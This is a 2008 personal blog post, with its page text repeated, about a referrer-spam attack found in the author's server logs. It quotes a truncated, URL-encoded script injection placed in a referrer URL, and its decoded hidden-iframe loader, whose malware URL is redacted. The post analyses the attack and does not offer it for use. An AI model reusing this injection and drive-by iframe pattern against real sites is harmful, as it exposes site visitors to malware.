Alden Bates' Weblog: Overcomplicating Hacks

Overcomplicating Hacks

Filed in: Spam.

Wow, it's the middle of the month already! Where does the time go?

A week or so ago I noticed an odd hit in my server logs. The referrer url looked like this:
http://buxhotel.com/?page=<script> eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72
[whole bunch more encoded characters cut out]
%72%61%6d%65%3e%22%29%3b'))</script>&t=2

Java script in the referrer? I guess the idea was that it would end up in the referrer logs which I don't publish on my web site, and then any unsuspecting people who visited said logs would execute the javascript. Or possibly would follow the link to the buxhotel page, which would give them back the javascript. Anyway the pile of encoded characters translated to more javascript, which looked like this:
document.write("<iframe src='[URL REDACTED]' height='2' width='2'> </iframe>");

The iframe loaded a URL containing yet more javascript which started document.write(unescape('%3c%68%74%6d%6c%3e etc etc etc. I didn't bother to extract all of it, but what I did translate made it obvious that the page was loaded with nasty spyware and viruses.

So to recap, this method depends on the target site publishing its logs publicly in some manner that people will either execute the long chain of javascript by visiting the logs or by following the link. Either way, it seems just a bit desperate to me...

Posted April 16, 2008 1:42 AM

Alden Bates' Weblog

Feigning normality since 1973

Overcomplicating Hacks

Comments

Post a comment


	Home : April 2008 Alden Bates' Weblog Feigning normality since 1973 « Resurrection of the Daleks \| Main \| Windows Live Messenger is a Hog » Overcomplicating Hacks Filed in: Spam. Wow, it's the middle of the month already! Where does the time go? A week or so ago I noticed an odd hit in my server logs. The referrer url looked like this: http://buxhotel.com/?page=<script> eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72 [whole bunch more encoded characters cut out] %72%61%6d%65%3e%22%29%3b'))</script>&t=2 Java script in the referrer? I guess the idea was that it would end up in the referrer logs which I don't publish on my web site, and then any unsuspecting people who visited said logs would execute the javascript. Or possibly would follow the link to the buxhotel page, which would give them back the javascript. Anyway the pile of encoded characters translated to more javascript, which looked like this: document.write("<iframe src='[URL REDACTED]' height='2' width='2'> </iframe>"); The iframe loaded a URL containing yet more javascript which started document.write(unescape('%3c%68%74%6d%6c%3e etc etc etc. I didn't bother to extract all of it, but what I did translate made it obvious that the page was loaded with nasty spyware and viruses. So to recap, this method depends on the target site publishing its logs publicly in some manner that people will either execute the long chain of javascript by visiting the logs or by following the link. Either way, it seems just a bit desperate to me... Posted April 16, 2008 1:42 AM Comments I didn't understand a single word of that. :) Posted by: Jeff Stone \| April 16, 2008 4:58 AM Post a comment Name: Email Address: URL: Remember personal info? Comments: (you may use HTML tags for style)
Tetrap.com Site Map